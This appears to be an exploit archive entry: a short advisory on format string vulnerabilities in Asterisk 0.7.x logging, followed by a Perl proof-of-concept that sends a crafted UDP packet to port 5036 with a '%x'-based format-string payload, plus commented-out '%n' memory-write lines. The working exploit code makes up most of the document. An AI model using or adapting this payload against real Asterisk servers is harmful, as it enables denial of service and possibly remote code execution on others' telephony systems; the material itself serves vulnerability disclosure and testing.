44 lines
No EOL
1.7 KiB
Perl
Executable file
44 lines
No EOL
1.7 KiB
Perl
Executable file
source: https://www.securityfocus.com/bid/10569/info
|
|
|
|
It is reported that Asterisk is susceptible to format string vulnerabilities in its logging functions.
|
|
|
|
An attacker may use these vulnerabilities to corrupt memory, and read or write arbitrary memory. Remote code execution is likely possible.
|
|
|
|
Due to the nature of these vulnerabilities, there may exist many different avenues of attack. Anything that can potentially call the logging functions with user-supplied data is vulnerable.
|
|
|
|
Versions 0.7.0 through to 0.7.2 are reported vulnerable.
|
|
|
|
#!/usr/bin/perl
|
|
#
|
|
# Asterisk 0.7.2 Linux PBX Remote Format string DoS (PoC)
|
|
#
|
|
# Feb 29 22:58:08 NOTICE[27151280]: Rejected connect attempt from 127.0.0.1, request
|
|
# 'exten=;callerid=;dnid=;context=;username=ce0ca0;language=;formats=;version=;}'
|
|
|
|
#
|
|
# kfinisterre[at]secnetops[dot]com - Copyright Secure Network Operations.
|
|
#
|
|
|
|
use IO::Socket::INET;
|
|
|
|
$sock=new IO::Socket::INET->new(PeerPort=>5036, Proto=>'udp', PeerAddr=>'localhost');
|
|
#$malpayload = "%.10d.";
|
|
#$malpayload .= "%.10d"; # add 6 to length
|
|
#$malpayload .="%n"; # write to the third address... we
|
|
have control of $esi
|
|
$malpayload = "AAAABBBB" . "%x." x 25;
|
|
$malpayload .="\x3b";
|
|
|
|
$payload = "\xa3\x7d\xff\xff\x00\x00\x00\x01\x00\x00\x06\x01\x65\x78\x74\x65\x6e\x3d\x3b" . # extern=;
|
|
"\x63\x61\x6c\x6c\x65\x72\x69\x64\x3d\x3b" . # callerid=;
|
|
"\x64\x6e\x69\x64\x3d\x3b" . # dnid=;
|
|
"\x63\x6f\x6e\x74\x65\x78\x74\x3d\x3b" . # context=;
|
|
"$malpayload" .
|
|
"\x75\x73\x65\x72\x6e\x61\x6d\x65\x3d" . # username=;
|
|
"\x6c\x61\x6e\x67\x75\x61\x67\x65\x3d\x3b" . # language=;
|
|
"\x66\x6f\x72\x6d\x61\x74\x73\x3d\x3b" . # formats=;
|
|
"\x76\x65\x72\x73\x69\x6f\x6e\x3d\x3b" . # version=;
|
|
"\xa3\x7d\xff\xff\x00\x00\x00\x15\x00\x01\x06\x0b"; # end of payload
|
|
|
|
$sock->send($payload);
|
|
close($sock); |